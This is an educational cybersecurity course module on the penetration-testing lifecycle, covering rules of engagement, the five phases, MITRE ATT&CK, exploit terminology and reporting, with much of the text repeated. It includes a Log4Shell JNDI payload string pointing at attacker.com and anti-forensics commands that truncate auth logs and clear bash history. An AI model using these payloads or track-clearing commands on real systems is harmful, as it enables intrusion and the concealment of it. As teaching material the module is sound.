Cybersecurity Engineering

08. The Ethical Hacking Lifecycle

Module 08: Methodology

The 5 Stages of Hacking

Amateurs hack systems; professionals hack processes. A successful cyber attack or penetration test is never a random series of keystrokes. It is a highly structured, methodical campaign. Understanding the methodology is what separates a security professional who provides actionable findings from someone who just runs tools and hopes for the best.

This module breaks down the globally recognized 5-Stage Hacking Lifecycle used by both APT groups and certified ethical hackers, expands it with the MITRE ATT&CK Framework, and teaches you to think like an attacker so you can build better defenses.

📋 Before You Hack: Rules of Engagement

Every professional penetration test begins with a legal and scoping phase. Without this, you are committing a crime regardless of your intentions. This is non-negotiable:

Scope Document / Statement of Work: Explicitly defines what is in scope (which IP ranges, domains, applications) and what is explicitly out of scope. An authorized tester who goes outside the agreed scope can face criminal charges.
Rules of Engagement (ROE): Defines permitted testing techniques (can you use social engineering? physical access? denial of service?), testing hours (business hours only? 24/7?), escalation procedures (who to call if a critical vulnerability is found immediately), and handling of sensitive data discovered during testing.
Emergency Contacts: Who to call if you accidentally take down a production system, discover evidence of an active attack by a third party, or find evidence of ongoing criminal activity.
Get It In Writing: A verbal authorization is worthless. Every engagement requires a signed contract or permission letter. Keep a copy with you during testing.

🗺️ The 5 Phases of Penetration Testing

1. ReconnaissanceOSINT, footprinting

→

2. ScanningNmap, Nessus

→

3. Gaining AccessMetasploit, SQLi

→

4. Maintaining AccessBackdoors, persistence

→

5. Clearing TracksLog removal

Phase 1 — Reconnaissance (Footprinting):

The preparatory phase. The objective is to gather maximum intelligence about the target with minimum exposure. This is covered in depth in Module 05. Key activities: WHOIS lookups, DNS enumeration, Shodan queries, Google dorking, LinkedIn employee enumeration, GitHub secret scanning, and Wayback Machine historical analysis. In a real attack, an APT group may spend weeks or months in reconnaissance before making any contact with target systems. In a typical penetration test engagement, reconnaissance takes 1–3 days.

Phase 2 — Scanning and Enumeration:

The active phase where you touch the target network. You take the intelligence gathered in Phase 1 and validate it through direct interaction. Key activities:

Host Discovery: Nmap ping sweeps to identify live systems.
Port Scanning: Full-range SYN scans to identify all open ports on discovered hosts.
Service and Version Detection: nmap -sV to identify exact software versions—the foundation of CVE matching.
Vulnerability Scanning: Nessus, OpenVAS, or Nuclei automatically test discovered services against thousands of known vulnerability signatures. A vulnerability scanner is not a replacement for manual testing but is an excellent starting point for prioritization.
Enumeration: Extracting specific intelligence from discovered services: SMB enumeration (shares, users), LDAP enumeration (Active Directory users and groups), SNMP enumeration (device configurations), web application crawling.

Phase 3 — Gaining Access (Exploitation):

The actual compromise. An exploit is used to take advantage of a specific vulnerability discovered in Phase 2. The goal is to gain code execution on the target system—a shell, a Meterpreter session, or remote command execution.

Common exploitation paths:

Known CVE Exploitation: The target runs an unpatched version of software with a known, public exploit (e.g., Apache Log4Shell, ProxyLogon for Exchange). Search Exploit-DB, GitHub, and Metasploit modules.
Web Application Exploitation: SQL Injection, Command Injection, SSRF, file upload bypass, or broken authentication in web applications.
Phishing: Craft a convincing email with a malicious payload targeting an employee whose details were gathered in Phase 1. Often the most reliable initial access vector.
Password Attacks: Credential stuffing (using known breach credentials), brute-force attacks against exposed services (SSH, RDP, VPN), or password spraying (trying common passwords against all users to avoid lockout).
Client-Side Attacks: Malicious Office documents, PDFs, or browser exploits delivered via email or a watering hole (compromised website the target is known to visit).

Phase 4 — Maintaining Access (Persistence and Post-Exploitation):

Getting a shell is not the end goal—it's the beginning of the real operation. Phase 4 activities:

Privilege Escalation: Elevate from the initial foothold (often a low-privilege user like www-data) to root/SYSTEM. Covered in depth in Module 04.
Persistence: Install mechanisms that survive reboots and re-establish access even if the initial exploit path is patched: cron jobs, scheduled tasks, startup scripts, registry Run keys, new administrator accounts, SSH authorized_keys, and malicious browser extensions.
Lateral Movement: Use the compromised machine as a pivot point to access other systems on the internal network that weren't reachable from outside. Techniques: pass-the-hash, SSH agent hijacking, SMB with stolen credentials, internal Nmap scanning through the pivot.
Credential Dumping: Extract stored credentials from the compromised system: LSASS memory dump (Windows), /etc/shadow (Linux), browser saved passwords, application config files with database credentials.
Data Exfiltration Simulation: Identify and document access to sensitive data that would be the attacker's objective—customer PII, financial records, source code, internal communications.

Phase 5 — Clearing Tracks (Evidence Removal):

In a real attack, this phase covers an attacker's presence. In a penetration test, this must be agreed upon in the ROE—most clients want testers to NOT clear tracks so the Blue Team can practice incident detection. However, understanding what attackers do here is essential for building detection capabilities:

Deleting or truncating log files: echo "" > /var/log/auth.log or using Meterpreter's clearev command
Clearing bash history: history -c and unset HISTFILE
Removing uploaded tools from /tmp
Restoring modified files to their original state (timestamps included)
Terminating processes created during testing

⚙️ TTPs: Tactics, Techniques, and Procedures

SOCs don't just track IP addresses and malware hashes—those change constantly. What persists across campaigns is how attackers operate. This is why MITRE ATT&CK exists.

MITRE ATT&CK Framework: A globally recognized knowledge base of real-world adversary tactics and techniques, built from actual observed attacks. Every technique has a unique ID (T1566 = Phishing), documentation of how it works, which threat groups use it, and detection guidance. This is what professional SOCs use to structure detection engineering.

Tactics (The Why): The adversary's high-level objective at each stage. ATT&CK defines 14 tactics including: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, and Exfiltration.
Techniques (The How): Specific methods used to achieve a tactic. T1566.001 (Spearphishing Attachment) is one technique under Initial Access. T1078 (Valid Accounts) is another. Each tactic has dozens of techniques.
Procedures (The Exactly What): The specific implementation—exact tools, commands, scripts, and infrastructure used by a particular threat group. APT28 uses X procedure to achieve T1566. This level of detail enables precise detection rules.

Practical Use: When building a detection rule in your SIEM, you don't just write "alert on suspicious process." You map your rule to a specific ATT&CK technique—"alert on T1055.001 (Process Injection: Dynamic-link Library Injection)"—ensuring comprehensive coverage and allowing you to identify gaps in your detection matrix.

🎯 Vulnerability vs. Exploit vs. Payload

These three terms are used interchangeably by beginners and precisely by professionals. The distinction matters when you're reading CVE descriptions, writing reports, or configuring Metasploit:

Vulnerability: The flaw. The weakness in the system that can be abused. It exists whether or not anyone exploits it. CVE-2021-44228 (Log4Shell) is a vulnerability—a flaw in the Log4j library's handling of JNDI lookup strings.
Exploit: The code, technique, or sequence of actions that takes advantage of the vulnerability to achieve an unintended outcome. The exploit turns the vulnerability from a theoretical weakness into an actual attack. A proof-of-concept (PoC) exploit for Log4Shell sends a crafted string like ${jndi:ldap://attacker.com/a} that triggers the vulnerability.
Payload: The malicious code that executes after the exploit succeeds. The exploit is the delivery vehicle; the payload is the cargo. After Log4Shell executes, the payload might be a reverse shell, a cryptocurrency miner, or ransomware. In Metasploit, you choose the exploit and the payload separately—the same exploit can deliver many different payloads.

💡 The Zero-Day Economy

A zero-day (0day) is a vulnerability unknown to the software vendor—they've had "zero days" to patch it. Because no patch exists, every system is vulnerable regardless of how rigorously it's updated. Zero-day exploits for major platforms are extraordinarily valuable:

iOS full-chain remote exploit: $2–3 million (Zerodium price list)
Android full-chain remote exploit: up to $2.5 million
Windows LPE (Local Privilege Escalation): $150–400K
Chrome RCE: up to $500K

These exploits are sold to governments, intelligence agencies, and commercial surveillance companies. Once a zero-day is publicly disclosed (by a researcher or after a breach), it immediately becomes a regular CVE and a race begins—attackers try to exploit the millions of still-unpatched systems before defenders patch them. This window between public disclosure and widespread patching is called the "exploitation window"—typically 1–30 days for critical vulnerabilities.

📝 Penetration Test Reporting

The deliverable of every penetration test is the report. A technically perfect engagement is worthless if the findings cannot be communicated to both technical teams and executive stakeholders. A professional pentest report contains:

Executive Summary: 1–2 page non-technical overview of findings, risk rating, and key recommendations. Written for CISOs and executives who will not read the technical details.
Scope and Methodology: What was tested, what was excluded, what techniques were used, and the testing timeline.
Findings: Each vulnerability documented with: title, severity rating (Critical/High/Medium/Low), CVSS score, affected systems, description of the vulnerability, proof of exploitation (screenshots, command output), business impact, and step-by-step remediation guidance.
Risk Rating: Overall risk rating for the engagement. How severe is the organization's current security posture?
Recommendations: Prioritized remediation roadmap—what to fix first, what can wait.

✅ Module 08 Summary

Every professional engagement starts with written authorization and defined scope. Working outside scope makes you a criminal.
The 5 phases: Reconnaissance → Scanning → Gaining Access → Maintaining Access → Clearing Tracks. Every successful attack follows this pattern.
MITRE ATT&CK provides a common language for TTPs. Use it to structure detection rules, threat hunting queries, and red team exercises.
Vulnerability (the flaw) ≠ Exploit (the weapon) ≠ Payload (the goal). Understand these distinctions before working with any exploitation framework.
Zero-days are worth millions precisely because no defense exists. The patch cycle is the most critical window.

08. The Ethical Hacking Lifecycle

Module 08: Methodology

The 5 Stages of Hacking

📋 Before You Hack: Rules of Engagement

Every professional penetration test begins with a legal and scoping phase. Without this, you are committing a crime regardless of your intentions. This is non-negotiable:

Scope Document / Statement of Work: Explicitly defines what is in scope (which IP ranges, domains, applications) and what is explicitly out of scope. An authorized tester who goes outside the agreed scope can face criminal charges.
Rules of Engagement (ROE): Defines permitted testing techniques (can you use social engineering? physical access? denial of service?), testing hours (business hours only? 24/7?), escalation procedures (who to call if a critical vulnerability is found immediately), and handling of sensitive data discovered during testing.
Emergency Contacts: Who to call if you accidentally take down a production system, discover evidence of an active attack by a third party, or find evidence of ongoing criminal activity.
Get It In Writing: A verbal authorization is worthless. Every engagement requires a signed contract or permission letter. Keep a copy with you during testing.

🗺️ The 5 Phases of Penetration Testing

1. ReconnaissanceOSINT, footprinting

→

2. ScanningNmap, Nessus

→

3. Gaining AccessMetasploit, SQLi

→

4. Maintaining AccessBackdoors, persistence

→

5. Clearing TracksLog removal

Phase 1 — Reconnaissance (Footprinting):

Phase 2 — Scanning and Enumeration:

The active phase where you touch the target network. You take the intelligence gathered in Phase 1 and validate it through direct interaction. Key activities:

Host Discovery: Nmap ping sweeps to identify live systems.
Port Scanning: Full-range SYN scans to identify all open ports on discovered hosts.
Service and Version Detection: nmap -sV to identify exact software versions—the foundation of CVE matching.
Vulnerability Scanning: Nessus, OpenVAS, or Nuclei automatically test discovered services against thousands of known vulnerability signatures. A vulnerability scanner is not a replacement for manual testing but is an excellent starting point for prioritization.
Enumeration: Extracting specific intelligence from discovered services: SMB enumeration (shares, users), LDAP enumeration (Active Directory users and groups), SNMP enumeration (device configurations), web application crawling.

Phase 3 — Gaining Access (Exploitation):

Common exploitation paths:

Known CVE Exploitation: The target runs an unpatched version of software with a known, public exploit (e.g., Apache Log4Shell, ProxyLogon for Exchange). Search Exploit-DB, GitHub, and Metasploit modules.
Web Application Exploitation: SQL Injection, Command Injection, SSRF, file upload bypass, or broken authentication in web applications.
Phishing: Craft a convincing email with a malicious payload targeting an employee whose details were gathered in Phase 1. Often the most reliable initial access vector.
Password Attacks: Credential stuffing (using known breach credentials), brute-force attacks against exposed services (SSH, RDP, VPN), or password spraying (trying common passwords against all users to avoid lockout).
Client-Side Attacks: Malicious Office documents, PDFs, or browser exploits delivered via email or a watering hole (compromised website the target is known to visit).

Phase 4 — Maintaining Access (Persistence and Post-Exploitation):

Getting a shell is not the end goal—it's the beginning of the real operation. Phase 4 activities:

Privilege Escalation: Elevate from the initial foothold (often a low-privilege user like www-data) to root/SYSTEM. Covered in depth in Module 04.
Persistence: Install mechanisms that survive reboots and re-establish access even if the initial exploit path is patched: cron jobs, scheduled tasks, startup scripts, registry Run keys, new administrator accounts, SSH authorized_keys, and malicious browser extensions.
Lateral Movement: Use the compromised machine as a pivot point to access other systems on the internal network that weren't reachable from outside. Techniques: pass-the-hash, SSH agent hijacking, SMB with stolen credentials, internal Nmap scanning through the pivot.
Credential Dumping: Extract stored credentials from the compromised system: LSASS memory dump (Windows), /etc/shadow (Linux), browser saved passwords, application config files with database credentials.
Data Exfiltration Simulation: Identify and document access to sensitive data that would be the attacker's objective—customer PII, financial records, source code, internal communications.

Phase 5 — Clearing Tracks (Evidence Removal):

Deleting or truncating log files: echo "" > /var/log/auth.log or using Meterpreter's clearev command
Clearing bash history: history -c and unset HISTFILE
Removing uploaded tools from /tmp
Restoring modified files to their original state (timestamps included)
Terminating processes created during testing

⚙️ TTPs: Tactics, Techniques, and Procedures

SOCs don't just track IP addresses and malware hashes—those change constantly. What persists across campaigns is how attackers operate. This is why MITRE ATT&CK exists.

Tactics (The Why): The adversary's high-level objective at each stage. ATT&CK defines 14 tactics including: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, and Exfiltration.
Techniques (The How): Specific methods used to achieve a tactic. T1566.001 (Spearphishing Attachment) is one technique under Initial Access. T1078 (Valid Accounts) is another. Each tactic has dozens of techniques.
Procedures (The Exactly What): The specific implementation—exact tools, commands, scripts, and infrastructure used by a particular threat group. APT28 uses X procedure to achieve T1566. This level of detail enables precise detection rules.

🎯 Vulnerability vs. Exploit vs. Payload

These three terms are used interchangeably by beginners and precisely by professionals. The distinction matters when you're reading CVE descriptions, writing reports, or configuring Metasploit:

Vulnerability: The flaw. The weakness in the system that can be abused. It exists whether or not anyone exploits it. CVE-2021-44228 (Log4Shell) is a vulnerability—a flaw in the Log4j library's handling of JNDI lookup strings.
Exploit: The code, technique, or sequence of actions that takes advantage of the vulnerability to achieve an unintended outcome. The exploit turns the vulnerability from a theoretical weakness into an actual attack. A proof-of-concept (PoC) exploit for Log4Shell sends a crafted string like ${jndi:ldap://attacker.com/a} that triggers the vulnerability.
Payload: The malicious code that executes after the exploit succeeds. The exploit is the delivery vehicle; the payload is the cargo. After Log4Shell executes, the payload might be a reverse shell, a cryptocurrency miner, or ransomware. In Metasploit, you choose the exploit and the payload separately—the same exploit can deliver many different payloads.

💡 The Zero-Day Economy

iOS full-chain remote exploit: $2–3 million (Zerodium price list)
Android full-chain remote exploit: up to $2.5 million
Windows LPE (Local Privilege Escalation): $150–400K
Chrome RCE: up to $500K

📝 Penetration Test Reporting

Executive Summary: 1–2 page non-technical overview of findings, risk rating, and key recommendations. Written for CISOs and executives who will not read the technical details.
Scope and Methodology: What was tested, what was excluded, what techniques were used, and the testing timeline.
Findings: Each vulnerability documented with: title, severity rating (Critical/High/Medium/Low), CVSS score, affected systems, description of the vulnerability, proof of exploitation (screenshots, command output), business impact, and step-by-step remediation guidance.
Risk Rating: Overall risk rating for the engagement. How severe is the organization's current security posture?
Recommendations: Prioritized remediation roadmap—what to fix first, what can wait.

✅ Module 08 Summary

Every professional engagement starts with written authorization and defined scope. Working outside scope makes you a criminal.
The 5 phases: Reconnaissance → Scanning → Gaining Access → Maintaining Access → Clearing Tracks. Every successful attack follows this pattern.
MITRE ATT&CK provides a common language for TTPs. Use it to structure detection rules, threat hunting queries, and red team exercises.
Vulnerability (the flaw) ≠ Exploit (the weapon) ≠ Payload (the goal). Understand these distinctions before working with any exploitation framework.
Zero-days are worth millions precisely because no defense exists. The patch cycle is the most critical window.

08. The Ethical Hacking Lifecycle

The 5 Stages of Hacking

📋 Before You Hack: Rules of Engagement

🗺️ The 5 Phases of Penetration Testing

⚙️ TTPs: Tactics, Techniques, and Procedures

🎯 Vulnerability vs. Exploit vs. Payload

📝 Penetration Test Reporting

✅ Module 08 Summary

Knowledge Check

08. The Ethical Hacking Lifecycle

The 5 Stages of Hacking

📋 Before You Hack: Rules of Engagement

🗺️ The 5 Phases of Penetration Testing

⚙️ TTPs: Tactics, Techniques, and Procedures

🎯 Vulnerability vs. Exploit vs. Payload

📝 Penetration Test Reporting

✅ Module 08 Summary

Knowledge Check